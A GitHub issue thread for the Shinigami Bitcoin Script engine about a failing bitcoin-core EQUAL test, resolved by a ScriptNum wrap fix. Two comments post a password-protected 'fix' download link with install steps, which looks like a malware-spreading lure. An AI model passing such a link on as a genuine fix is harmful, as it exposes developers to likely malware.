### ISSUE TITLE
[bug] [bitcoin-core test] '-4294967295 0x05 0xFFFFFFFF80 EQUAL'

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#171]
### Issue

The following bitcoin-core test is failing to give the correct result :
```
ScriptSig: '-4294967295' -- ScriptPubKey: '0x05 0xFFFFFFFF80 EQUAL'
```

This code should be passing, but is failing at the EQUAL operation when comparing `-4294967295` and `0xFFFFFFFF80`.

### Replicate

To replicate the issue you can use the latest `main` branch with the following command:
```
scarb cairo-run '[[],54648151398953683858372917,11,[],4642454408269420813098407607158452215490494213563695436,23]'
```

**Comment by b-j-roberts** [comment]
@petersdt would you be interested in taking this issue?

**Comment by NueloSE** [comment]
H

**Comment by PavitraAgarwal21** [comment]
Can I take this issue

**Comment by ooochoche** [comment]
Hi

**Comment by petersdt** [comment]
> @petersdt would you be interested in taking this issue?

yes pls

**Comment by b-j-roberts** [comment]
Awesome @petersdt , welcome to the project. Let me know if you have any questions!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by b-j-roberts** [comment]
Here are the links I sent in our discussion:
- [Bitcoin Script opcodes](https://en.bitcoin.it/wiki/Script)
- [Bitcoin Data opcodes, like 0x05](https://wiki.bitcoinsv.io/index.php/Pushdata_Opcodes#:~:text=OP_PUSHDATA1%20(76%20or%200x4C),-OP_PUSHDATA1%20takes%20the&text=It%20can%20be%20used%20to,data%20item%20on%20the%20stack)
- [Shinigami engine, add self.dstack.print() after here for debugging](https://github.com/keep-starknet-strange/shinigami/blob/fe1c0d6764e1ab053cf615ac5de7e3c4d0cad25e/src/engine.cairo#L152C17-L152C61)
- [Shinigami data opcode used when running 0x05](https://github.com/keep-starknet-strange/shinigami/blob/fe1c0d6764e1ab053cf615ac5de7e3c4d0cad25e/src/opcodes/constants.cairo#L10)

**Comment by b-j-roberts** [comment]
Hey @petersdt , any update on debugging this test case?

**Comment by adrianvrj** [comment]
hi @b-j-roberts if the assigned person does not reports back I could tackle this one!

**Comment by petersdt** [comment]
> Hey @petersdt , any update on debugging this test case?

Thanks to the resource you shared i have an understanding of how it works now. currently trying to log and locate the reason for failure.

I would revert on this soon. Am making some progress.

**Comment by b-j-roberts** [comment]
@petersdt Any updates on this? What are the 2 values in the stack after the equal operation?

**Comment by b-j-roberts** [comment]
This issue has been resolved from a bug fix in the ScriptNum wrap function. https://github.com/keep-starknet-strange/shinigami/commit/57c2fa4fa81ae68ad35ed4e6d31dffe37b3db7fa

Thank you.
